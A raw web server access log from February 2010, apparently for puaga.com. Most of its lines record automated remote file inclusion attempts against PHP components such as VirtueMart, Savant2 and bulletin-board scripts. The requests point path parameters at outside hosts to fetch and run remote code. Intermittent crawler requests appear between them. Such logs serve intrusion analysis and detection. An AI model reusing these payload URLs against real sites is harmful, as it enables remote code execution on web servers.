195.190.166.35 - - [21/Feb/2010:06:52:13 -0800] "GET /logs/access_100118.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:52:33 -0800] "GET /logs/access_100118.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:52:44 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:52:50 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:52:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:52:51 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:06:54:34 -0800] "GET /logs/access_100119.log//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:06:54:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:06:54:34 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [21/Feb/2010:06:55:25 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [21/Feb/2010:06:55:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [21/Feb/2010:06:55:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.97.241.67 - - [21/Feb/2010:06:56:01 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anka.interfree.it/interfree?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:56:01 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
218.97.241.67 - - [21/Feb/2010:06:56:01 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anka.interfree.it/interfree?? HTTP/1.1" 404 5258 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:56:06 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:56:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:56:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:56:19 -0800] "GET /logs/access_100122.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:56:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:56:20 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:06:58:17 -0800] "GET /radio1/ HTTP/1.0" 200 1156 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:06:58:17 -0800] "GET /i/style.css HTTP/1.0" 404 5258 "http://www.puaga.com/radio1/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:06:58:18 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/radio1/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:29 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:29 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:29 -0800] "GET /modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:37 -0800] "GET /modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:37 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:37 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:41 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:41 -0800] "GET /modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:41 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:41 -0800] "GET /modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:41 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:41 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:59:52 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:00:04 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:00:04 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:00:07 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [21/Feb/2010:07:00:31 -0800] "GET /logs/access_100125.log//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [21/Feb/2010:07:01:08 -0800] "GET /logs/access_100130.log//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:01:33 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:01:33 -0800] "GET /modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:01:33 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:01:53 -0800] "GET /logs/access_100123.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:01:58 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:02:06 -0800] "GET /modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:02:06 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:02:06 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:02:26 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:03:14 -0800] "GET /logs/access_100129.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
60.191.221.86 - - [21/Feb/2010:07:03:35 -0800] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [21/Feb/2010:07:03:35 -0800] "GET /logs/access_100123.log%20%20//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [21/Feb/2010:07:03:36 -0800] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:03:57 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:04:00 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:04:00 -0800] "GET /modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:04:01 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:07:04:25 -0800] "GET /logs/access_100205.log//index.php?option=com_search&mosConfig.absolute.path=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:04:27 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:07:04:50 -0800] "GET /logs/access_100205.log//index.php?option=com_search&mosConfig.absolute.path=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [21/Feb/2010:07:05:36 -0800] "GET /module/ HTTP/1.0" 200 1362 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
78.96.119.121 - - [21/Feb/2010:07:06:34 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "puaga.com"
74.86.155.18 - - [21/Feb/2010:07:07:34 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:07:34 -0800] "GET /logs/access_100202.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:07:34 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [21/Feb/2010:07:07:43 -0800] "GET //bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [21/Feb/2010:07:07:43 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [21/Feb/2010:07:07:48 -0800] "GET /logs/access_100129.log///bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [21/Feb/2010:07:07:48 -0800] "GET /logs/access_100202.log///bbs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:07:53 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:07:53 -0800] "GET /logs/access_100202.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:07:53 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:07:58 -0800] "GET /logs/access_100121.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:08:16 -0800] "GET /logs/access_100121.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [21/Feb/2010:07:09:35 -0800] "GET /logs/access.log%20%20//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [21/Feb/2010:07:15:12 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [21/Feb/2010:07:15:33 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:16:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:16:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:16:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:16:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:16:52 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:16:52 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:02 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:03 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:06 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:06 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [21/Feb/2010:07:17:21 -0800] "GET /logs/access_100125.log//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [21/Feb/2010:07:17:45 -0800] "GET /logs/access_100130.log//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:55 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:55 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:17:55 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:19:27 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:19:28 -0800] "GET /logs/access_100208.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:19:28 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:19:29 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:19:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:19:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:19:34 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:19:34 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:19:35 -0800] "GET /logs/access_100208.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:11 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:12 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
